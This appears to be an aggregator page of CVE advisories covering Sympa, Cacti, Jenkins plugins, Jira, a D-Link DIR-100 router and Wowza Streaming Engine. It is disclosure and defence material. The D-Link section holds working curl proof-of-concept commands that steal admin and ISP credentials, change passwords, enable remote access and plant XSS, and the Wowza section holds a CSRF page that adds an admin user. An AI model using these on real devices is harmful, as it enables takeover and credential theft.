Sympa 6.2.38 through 6.2.52 allows remote attackers to cause a denial of service (disk consumption from temporary files, and a flood of notifications to listmasters) via a series of requests with malformed parameters.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-9369: [SA 2020-001] Security flaws in CSRF prevension, CVE-2020-9369 · Issue #886 · sympa-community/sympa

graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.

CVE-2020-8813: Releases · Cacti/cacti

A missing permission check in Jenkins Pipeline GitHub Notify Step Plugin 1.0.4 and earlier in form-related methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Applatix Plugin
*   Azure AD Plugin
*   BMC Release Package and Deployment Plugin
*   brakeman Plugin
*   debian-package-builder Plugin
*   DigitalOcean Plugin
*   Dynamic Extended Choice Parameter Plugin
*   Eagle Tester Plugin
*   ECX Copy Data Management Plugin
*   FitNesse Plugin
*   Git Parameter Plugin
*   Google Kubernetes Engine Plugin
*   Harvest SCM Plugin
*   NUnit Plugin
*   Parasoft Environment Manager Plugin
*   Pipeline GitHub Notify Step Plugin
*   Pipeline: Groovy Plugin
*   RadarGun Plugin
*   S3 publisher Plugin
*   Script Security Plugin
*   Subversion Plugin

**Descriptions****Sandbox bypass via default method parameter expression in Pipeline: Groovy Plugin**

**SECURITY-1710 / CVE-2020-2109**

Sandbox protection in Pipeline: Groovy Plugin 2.78 and earlier can be circumvented through default parameter expressions in CPS-transformed methods.

This allows attackers able to specify and run sandboxed Pipelines to execute arbitrary code in the context of the Jenkins controller JVM.

These expressions are subject to sandbox protection in Pipeline: Groovy Plugin 2.79.

**Sandbox bypass vulnerability in Script Security Plugin**

**SECURITY-1713 / CVE-2020-2110**

Sandbox protection in Script Security Plugin 1.69 and earlier can be circumvented during the script compilation phase by applying AST transforming annotations such as @Grab to imports or by using them inside of other annotations. This affects both script execution (typically invoked from other plugins like Pipeline) as well as HTTP endpoints providing sandboxed script validation.

Users with Overall/Read permission can exploit this to bypass sandbox protection and execute arbitrary code on the Jenkins controller.

This issue is due to an incomplete fix of SECURITY-1266.

Script Security Plugin 1.70 disallows all known unsafe AST transformations on imports or when used inside of other annotations.

**Stored XSS vulnerability in Subversion Plugin**

**SECURITY-1725 / CVE-2020-2111**

Subversion Plugin 2.13.0 and earlier does not escape the error message for the Project Repository Base URL field form validation. This results in a stored cross-site scripting vulnerability exploitable by users able to specify such base URLs, for example users able to configure Multibranch Pipelines.

Subversion Plugin 2.13.1 escapes the affected part of the error message.

**Multiple stored XSS vulnerabilities in Git Parameter Plugin**

**SECURITY-1709 / CVE-2020-2112 (parameter name), CVE-2020-2113 (default value)**

Git Parameter Plugin 0.9.11 and earlier does not correctly escape the parameter name or default value. This results in a stored cross-site scripting vulnerability exploitable by users with Job/Configure permission.

Git Parameter Plugin 0.9.12 escapes the parameter name and default value shown on the UI.

**Credential transmitted in plain text by S3 publisher Plugin**

**SECURITY-1684 / CVE-2020-2114**

S3 publisher Plugin stores a secret key in its global configuration.

While the credential is stored encrypted on disk, it is transmitted in plain text as part of the configuration form by S3 publisher Plugin 0.11.4 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

S3 publisher Plugin 0.11.5 transmits the secret key in its global configuration encrypted.

**XXE vulnerability in NUnit Plugin**

**SECURITY-1752 / CVE-2020-2115**

NUnit Plugin 0.25 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for its post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

NUnit Plugin 0.26 disables external entity processing for its XML parser.

**CSRF vulnerability and missing permission checks in Pipeline GitHub Notify Step Plugin allows capturing credentials**

**SECURITY-812 (1) / CVE-2020-2116 (CSRF), CVE-2020-2117 (missing permission check)**

Pipeline GitHub Notify Step Plugin 1.0.4 and earlier does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.

This form validation method requires POST requests and Item/Configure permission in Pipeline GitHub Notify Step Plugin 1.0.5.

**Users with Overall/Read access can enumerate credential IDs in Pipeline GitHub Notify Step Plugin**

**SECURITY-812 (2) / CVE-2020-2118**

Pipeline GitHub Notify Step Plugin 1.0.4 and earlier provides a list of applicable credential IDs to allow users configuring the plugin to select the one to use.

This functionality does not correctly check permissions, allowing any user with Overall/Read permission to get a list of valid credentials IDs. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Pipeline GitHub Notify Step Plugin 1.0.5 requires the permission to configure a project.

**Client secret transmitted in plain text by Azure AD Plugin**

**SECURITY-1717 / CVE-2020-2119**

Azure AD Plugin stores a client secret in its global configuration.

While the credential is stored encrypted on disk, it is transmitted in plain text as part of the configuration form by Azure AD Plugin 1.1.2 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

Azure AD Plugin 1.2.0 transmits the client secret in its global configuration encrypted.

**XXE vulnerability in FitNesse Plugin**

**SECURITY-1751 / CVE-2020-2120**

FitNesse Plugin 1.30 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for its post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

FitNesse Plugin 1.31 disables external entity processing for its XML parser.

**RCE vulnerability in Google Kubernetes Engine Plugin**

**SECURITY-1731 / CVE-2020-2121**

Google Kubernetes Engine Plugin 0.8.0 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types. This results in a remote code execution vulnerability exploitable by users able to provide YAML input files to Google Kubernetes Engine Plugin’s build step.

Google Kubernetes Engine Plugin 0.8.1 configures its YAML parser to only instantiate safe types.

**Stored XSS vulnerability in brakeman Plugin**

**SECURITY-1644 / CVE-2020-2122**

brakeman Plugin 0.12 and earlier did not escape values received from parsed JSON files when rendering them, resulting in a stored cross-site scripting vulnerability.

This vulnerability can be exploited by users able to control the Brakeman post-build step input data.

brakeman Plugin 0.13 escape affected values from the parsed file as they are recorded.

This fix is only applied to newly recorded data after a fixed version of the plugin is installed; historical data may still contain unsafe values.

**RCE vulnerability in RadarGun Plugin**

**SECURITY-1733 / CVE-2020-2123**

RadarGun Plugin 1.7 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types. This results in a remote code execution vulnerability exploitable by users able to configure RadarGun Plugin’s build step.

RadarGun Plugin 1.8 configures its YAML parser to only instantiate safe types.

**Password stored in plain text by Dynamic Extended Choice Parameter Plugin**

**SECURITY-1560 / CVE-2020-2124**

Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier stores a Subversion password unencrypted in job config.xml files as part of its configuration. This credential can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Credentials stored in plain text by debian-package-builder Plugin**

**SECURITY-1558 / CVE-2020-2125**

debian-package-builder Plugin 1.6.11 and earlier stores a GPG passphrase unencrypted in its global configuration file ru.yandex.jenkins.plugins.debuilder.DebianPackageBuilder.xml on the Jenkins controller. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Token stored in plain text by DigitalOcean Plugin**

**SECURITY-1559 / CVE-2020-2126**

DigitalOcean Plugin 1.1 and earlier stores a token unencrypted in the global config.xml files as part of its configuration. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Credential stored in plain text by BMC Release Package and Deployment Plugin**

**SECURITY-1547 / CVE-2020-2127**

BMC Release Package and Deployment Plugin 1.1 and earlier stores the RPD user token unencrypted in its global configuration file com.bmc.rpd.jenkins.plugin.bmcrpd.configuration.RPDPluginConfiguration.xml on the Jenkins controller. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Password stored in plain text by ECX Copy Data Management Plugin**

**SECURITY-1549 / CVE-2020-2128**

ECX Copy Data Management Plugin 1.9 and earlier stores a service password unencrypted in job config.xml files as part of its configuration. This credential can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Password stored in plain text by Eagle Tester Plugin**

**SECURITY-1552 / CVE-2020-2129**

Eagle Tester Plugin 1.0.9 and earlier stores a password unencrypted in its global configuration file com.bmc.rpd.jenkins.plugin.bmcrpd.configuration.RPDPluginConfiguration.xml on the Jenkins controller. This credential can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Passwords stored in plain text by Harvest SCM Plugin**

**SECURITY-1553 / CVE-2020-2130 (global configuration), CVE-2020-2131 (job configuration)**

Harvest SCM Plugin 0.5.1 and earlier stores SCM passwords unencrypted in its global configuration file hudson.plugins.harvest.HarvestSCM.xml and in job config.xml files on the Jenkins controller. These credentials can be viewed by users with Extended Read permission (job config.xml only) or access to the Jenkins controller file system (both).

As of publication of this advisory, there is no fix.

**Password stored in plain text by Parasoft Environment Manager Plugin**

**SECURITY-1562 / CVE-2020-2132**

Parasoft Environment Manager Plugin 2.14 and earlier stores a repository password unencrypted in job config.xml files as part of its configuration. This credential can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Password stored in plain text by Applatix Plugin**

**SECURITY-1540 / CVE-2020-2133**

Applatix Plugin 1.1 and earlier stores the Applatix password unencrypted in job config.xml files as part of its configuration. This credential can be viewed by users with Extended Read permission or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-812 (1): High
*   SECURITY-812 (2): Medium
*   SECURITY-1540: Medium
*   SECURITY-1547: Low
*   SECURITY-1549: Medium
*   SECURITY-1552: Low
*   SECURITY-1553: Medium
*   SECURITY-1558: Low
*   SECURITY-1559: Low
*   SECURITY-1560: Medium
*   SECURITY-1562: Medium
*   SECURITY-1644: Medium
*   SECURITY-1684: Low
*   SECURITY-1709: Medium
*   SECURITY-1710: High
*   SECURITY-1713: High
*   SECURITY-1717: Low
*   SECURITY-1725: Medium
*   SECURITY-1731: High
*   SECURITY-1733: High
*   SECURITY-1751: High
*   SECURITY-1752: High

**Affected Versions**

*   **Applatix Plugin** up to and including 1.1
*   **Azure AD Plugin** up to and including 1.1.2
*   **BMC Release Package and Deployment Plugin** up to and including 1.1
*   **brakeman Plugin** up to and including 0.12
*   **debian-package-builder Plugin** up to and including 1.6.11
*   **DigitalOcean Plugin** up to and including 1.1
*   **Dynamic Extended Choice Parameter Plugin** up to and including 1.0.1
*   **Eagle Tester Plugin** up to and including 1.0.9
*   **ECX Copy Data Management Plugin** up to and including 1.9
*   **FitNesse Plugin** up to and including 1.30
*   **Git Parameter Plugin** up to and including 0.9.11
*   **Google Kubernetes Engine Plugin** up to and including 0.8.0
*   **Harvest SCM Plugin** up to and including 0.5.1
*   **NUnit Plugin** up to and including 0.25
*   **Parasoft Environment Manager Plugin** up to and including 2.14
*   **Pipeline GitHub Notify Step Plugin** up to and including 1.0.4
*   **Pipeline: Groovy Plugin** up to and including 2.78
*   **RadarGun Plugin** up to and including 1.7
*   **S3 publisher Plugin** up to and including 0.11.4
*   **Script Security Plugin** up to and including 1.69
*   **Subversion Plugin** up to and including 2.13.0

**Fix**

*   **Azure AD Plugin** should be updated to version 1.2.0
*   **brakeman Plugin** should be updated to version 0.13
*   **FitNesse Plugin** should be updated to version 1.31
*   **Git Parameter Plugin** should be updated to version 0.9.12
*   **Google Kubernetes Engine Plugin** should be updated to version 0.8.1
*   **NUnit Plugin** should be updated to version 0.26
*   **Pipeline GitHub Notify Step Plugin** should be updated to version 1.0.5
*   **Pipeline: Groovy Plugin** should be updated to version 2.79
*   **RadarGun Plugin** should be updated to version 1.8
*   **S3 publisher Plugin** should be updated to version 0.11.5
*   **Script Security Plugin** should be updated to version 1.70
*   **Subversion Plugin** should be updated to version 2.13.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Applatix Plugin
*   BMC Release Package and Deployment Plugin
*   debian-package-builder Plugin
*   DigitalOcean Plugin
*   Dynamic Extended Choice Parameter Plugin
*   Eagle Tester Plugin
*   ECX Copy Data Management Plugin
*   Harvest SCM Plugin
*   Parasoft Environment Manager Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Adith Sudhakar** for SECURITY-1644
*   **Daniel Kalinowski of ISEC.pl Research Team** for SECURITY-1731, SECURITY-1733
*   **Federico Pellegrin** for SECURITY-1751, SECURITY-1752
*   **James Holderness, IB Boost** for SECURITY-1540, SECURITY-1547, SECURITY-1549, SECURITY-1552, SECURITY-1553, SECURITY-1558, SECURITY-1559, SECURITY-1560, SECURITY-1562
*   **Joseph Petersen @jetersen** for SECURITY-1717
*   **Nils Emmerich of ERNW Research GmbH** for SECURITY-1710, SECURITY-1713
*   **Sven Grossmann (@svennergr)** for SECURITY-1709
*   **Thomas de Grenier de Latour** for SECURITY-812 (1), SECURITY-812 (2)
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1684, SECURITY-1725

CVE-2020-2118: Jenkins Security Advisory 2020-02-12

A missing permission check in Jenkins Pipeline GitHub Notify Step Plugin 1.0.4 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2020-2117: Jenkins Security Advisory 2020-02-12

The VerifySmtpServerConnection!add.jspa component in Atlassian Jira Server and Data Center before version 8.7.0 is vulnerable to cross-site request forgery (CSRF). An attacker could exploit this by tricking an administrative user into making malicious HTTP requests, allowing the attacker to enumerate hosts and open ports on the internal network where Jira server is present.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

CVE-2019-20098: Atlassian Jira Multiple CSRF

The VerifyPopServerConnection!add.jspa component in Atlassian Jira Server and Data Center before version 8.7.0 is vulnerable to cross-site request forgery (CSRF). An attacker could exploit this by tricking an administrative user into making malicious HTTP requests, allowing the attacker to enumerate hosts and open ports on the internal network where Jira server is present.

CVE-2019-20099: [JRASERVER-70606] CSRF in VerifyPopServerConnection!add.jspa - CVE-2019-20099

Various installation setup resources in Jira before version 8.5.2 allow remote attackers to configure a Jira instance, which has not yet finished being installed, via Cross-site request forgery (CSRF) vulnerabilities.

Various installation setup resources in Jira before version 8.5.2 allow remote attackers to configure a Jira instance, which has not yet finished being installed, via Cross-site request forgery (CSRF) vulnerabilities.

Once a Jira instance is setup (i.e. database, admin account, licence, etc. form are filled) the vulnerability can't be exploited anymore.

CVE-2019-20401: [JRASERVER-70406] Various Jira Server setup resources are vulnerable to XSRF/CSRF - CVE-2019-20401

CVE-2013-7053

D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters

    * Title: Router D-Link DIR-100 Multiple Vulnerabilities
    * Date: 2013-09-19
    * Author: Felix Richter
    * Contact: root@euer.krebsco.de
    * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
    * Patched Software:    ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
    * Report Version: 2.0
    * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
    * Vulnerable: D-Link DIR-100
        * Hardware Revision: D1
        * Software Version: 4.03B07 (from 2012-04-10)
    * CVE Numbers: 
        * CWE-287 Authentication Issues:             CVE-2013-7051
        * CWE-255 Issues with Credential Management: CVE-2013-7052
        * CWE-352 Cross-Site Request Forgery:        CVE-2013-7053
        * CWE-79  Cross-Site Scripting:              CVE-2013-7054
        * CWE-200 Information Disclosure:            CVE-2013-7055
    * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
    * State: Patched by Vendor
    * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
    
    # Table of Contents
    
        1. Background
        2. Vulnerability Description
        3. Technical Description
        4. Severity and Remediation
        5. Timeline
    
    # 1. Background
    
    The DIR-100 is designed for easy and robust connectivity among heterogeneous
    standards-based network devices. Computers can communicate directly with this
    router for automatic opening and closing of UDP/TCP ports to take full
    advantage of the security provided without sacrificing functionality of on-line
    applications.
    
    # 2 Vulnerability Description
    
    Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
    Broadband Router Revision D (and potentially other devices sharing the 
    affected firmware) that could allow a remote attacker:
    
     - Retrieve the Administrator password without authentication leading to
       authentication bypass [CWE-255]
     - Retrieve sensitive configuration paramters like the pppoe username and
       password without authentication [CWE-200]
     - Execute privileged Commands without authentication through a race
       condition leading to weak authentication enforcement [CWE-287]
     - Sending formatted request to a victim which then will execute arbitrary
       commands on the device (CSRF) [CWE-352]
     - Store arbitrary javascript code which will be executed when a victim
       accesses the administrator interface [CWE-79]
    
    CVE-Numbers for these vulnerabilities has not yet been assigned.
    
    # 3 Technical Description of the Vulnerabilities
    
    ## 3.0 The DIR-100 Web Interface and CGI
    
    The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
    unauthenticated users and `/cli.cgi` for authenticated requests.
    
    list of features provided by each cgi-script can be retrieved by:
    
        curl 'http://192.168.1.104/cliget.cgi?cmd=help'
        # and respectively when authenticated
        curl 'http://192.168.1.104/cli.cgi?cmd=help'
    
    ## 3.1 Authentication Bypass
    
    ### Description
    
    The administrator password is not protected in any way on the device, every
    attacker with access to the administrator interface which listens on port 80.
    For retrieving the Administrator password the request must not be
    authenticated. 
    
    
    ### Proof of Concept
    
    The web interface provides two distinct ways to retrieve the adminstrator
    password:
    
        curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
        curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
    
    ## 3.2 Weak Authentication
    
    ### Description
    
    As soon as a user is logged into the administration interface, the cli CGI
    is `unlocked` and can be used by without authenticating before as
    the cgi-script does not check any other authentication parameters such as
    cookies or HTTP Parameters. The only access check is if the IP-Address is 
    the same. 
    
    ### Proof of Concept
        
        # open the router interface in a web browser and log in
        firefox  'http://192.168.0.1/' 
        
        # open a new terminal or another web-browser which is currently not logged
        # in and try to access
    
        curl 'http://192.168.0.1/cli.cgi?cmd=help'
    
        # this request will be authenticated and it will not be redirected to the
        # login page. If no user is logged in, the request will be redirected to
        # the login 
    
    ## 3.3 Retrieve sensitive information
    
    ### Description
    
    Besides retrieving the administrator password without authentication it is
    possible to retrieve other sensitive configuration from the device as well like
    the PPTP and poe Username and Password, as well as the configured dyndns
    username and password and configured mail log credentials when these parameters
    are configured. 
    No authentication is requred.
    
    ### Proof of Concept
    
        curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
    
    ## 3.4 Cross-Site Request Forgery (CSRF)
    
    ### Description
    
    CSRF attacks can be launched by sending a formatted request to a victim, then
    tricking the victim into loading the request (often automatically), which
    makes it appear that the request came from the victim. As an example the
    attacker could change the administrator password (see Proof of Concept code)
    and enable system remote access.
    
    ### Proof of Concept
    
    Changing the password for administrator can be done when the ip-address is
    authenticated:
    
        # Log into DIR-100
        curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    
        # Change password
        curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
    
        # enable remote console
        curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
    
    ## 3.5 Cross-Site Scripting (XSS)
    
    ### Description
    
    It is possible for an authenticated user to store information on the server
    which will not be checked on the server side for special characters which
    results in persistent Cross-Site Scripting Vulnerabilities. With this
    vulnerabilty the victim (administrator) will run javascript code in the 
    context of the D-Link DIR-100.
    
    XSS is possible because only on the client side (javascript code) the input is
    filtered and validated, sending data directly to the CGI scripts.
    
    ### Proof of Concept
    
        # Log into DIR-100
        curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    
        #  XSS in Static IP Address Tab
        curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
    
        # XSS in Scheduler tab
        curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
    
    # 4 Severity and Remediation
    
    This exploits are considered very critical, especially when the feature of remote
    administration is activated on the system.  
    Weak authentication, together with cross-site request forgery and authentication 
    bypass can result in a full device compromise from an arbitrary website the victim is
    accessing, even if the device has remote administration deactivated on the
    internet-port. It is recommended to upgrade the router with the newest firmware
    of the D-Link DIR-100.
    
    # 5 Timeline
    
    2013-09-13 - First Contact with D-Link Support
    2013-09-19 - Sent Report
    2013-10-14 - Request Status update, Response: Beta will be available mid October
    2013-12-02 - Vendor publishes Firmware Update 
    2013-12-11 - Request CVE-IDs
    2013-12-18 - Publish the report

CVE-2013-7051: Offensive Security’s Exploit Database Archive

Wowza Streaming Engine 4.8.0 and earlier suffers from multiple CSRF vulnerabilities. For example, an administrator, by following a link, can be tricked into making unwanted changes such as adding another admin user via enginemanager/server/user/edit.htm in the Server->Users component. This issue was resolved in Wowza Streaming Engine 4.8.5.

The Wowza Streaming Engine 4.7.7 build 20181108145350 and 4.7.8 build 20191105123929 applications suffer from multiple CSRF vulnerabilities. For example, an administrator, by following a link, can be tricked into making unwanted changes like adding another admin user.

**Evidence**

Admin users: 

An authenticated admin user can be tricked into accessing a page containing the following code:

    <html> 
    <body onload='document.frm1.submit();'> 
     <script>history.pushState('', '', '/')</script> 
     <form name="frm1" action="http://192.168.1.180:8088/enginemanager/server/user/edit.htm" method="POST"> 
     <input type="hidden" name="version" value="0" /> 
     <input type="hidden" name="action" value="new" /> 
     <input type="hidden" name="userName" value="wowadmin3" /> 
     <input type="hidden" name="userPassword" value="wowadmin3" /> 
     <input type="hidden" name="userPassword2" value="wowadmin3" /> 
     <input type="hidden" name="accessLevel" value="admin" /> 
     <input type="hidden" name="advUser" value="true" /> 
     <input type="hidden" name="advUser" value="on" /> 
     <input type="hidden" name="ignoreWarnings" value="false" /> 
     <input type="submit" value="Submit request" /> 
     </form> 
     </body> 
    </html>
    

He then unknowingly will make a request that adds another application admin user (wowadmin3):

    POST /enginemanager/server/user/edit.htm HTTP/1.1
    Host: 192.168.1.180:8088
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://wowtest.com/
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 150
    
    version=0&action=new&userName=wowadmin3&userPassword=wowadmin3&userPassword2=wowadmin3&accessLevel=admin&advUser=true&_advUser=on&ignoreWarnings=false

Tag

#csrf